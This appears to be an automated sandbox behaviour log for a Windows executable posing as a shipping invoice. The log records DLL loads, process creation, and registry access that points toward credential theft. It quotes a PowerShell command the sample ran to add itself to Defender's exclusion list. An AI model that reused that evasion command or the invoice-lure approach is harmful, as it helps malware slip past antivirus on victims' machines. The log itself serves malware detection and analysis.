                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exeReversingLabs: Detection: 50%
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeFile read: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe"
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -Force
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3648 -s 1124
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -ForceJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: System.Windows.Forms.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: mscorlib.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.ni.pdbRSDS source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.CSharp.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Dynamic.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Windows.Forms.ni.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Drawing.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: mscorlib.ni.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Drawing.ni.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Core.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Drawing.ni.pdbRSDS source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Core.pdbH source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.ni.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.CSharp.pdb0X source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Core.ni.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exeStatic PE information: 0xD9A1AC26 [Thu Sep 13 20:27:18 2085 UTC]
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeCode function: 0_2_00007FF7C183C9A2 push ss; retf 0_2_00007FF7C183C9A4
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeCode function: 0_2_00007FF7C18300BD pushad ; iretd 0_2_00007FF7C18300C1
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeCode function: 0_2_00007FF7C183C86D push ss; iretd 0_2_00007FF7C183C86F
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeCode function: 0_2_00007FF7C183D865 push ebp; iretd 0_2_00007FF7C183D868
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeCode function: 0_2_00007FF7C18307B5 push eax; ret 0_2_00007FF7C18307EB
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeCode function: 0_2_00007FF7C194060B push esp; retf 4810h0_2_00007FF7C19406B2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_02B3CC4E pushfd ; iretd 4_2_02B3CC5A
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeFile created: \commercial invoice - bl - awb 7032805642.exe
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeFile created: \commercial invoice - bl - awb 7032805642.exe
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeFile created: \commercial invoice - bl - awb 7032805642.exe
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeFile created: \commercial invoice - bl - awb 7032805642.exe
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeFile created: \commercial invoice - bl - awb 7032805642.exeJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeFile created: \commercial invoice - bl - awb 7032805642.exeJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeFile created: \commercial invoice - bl - awb 7032805642.exeJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
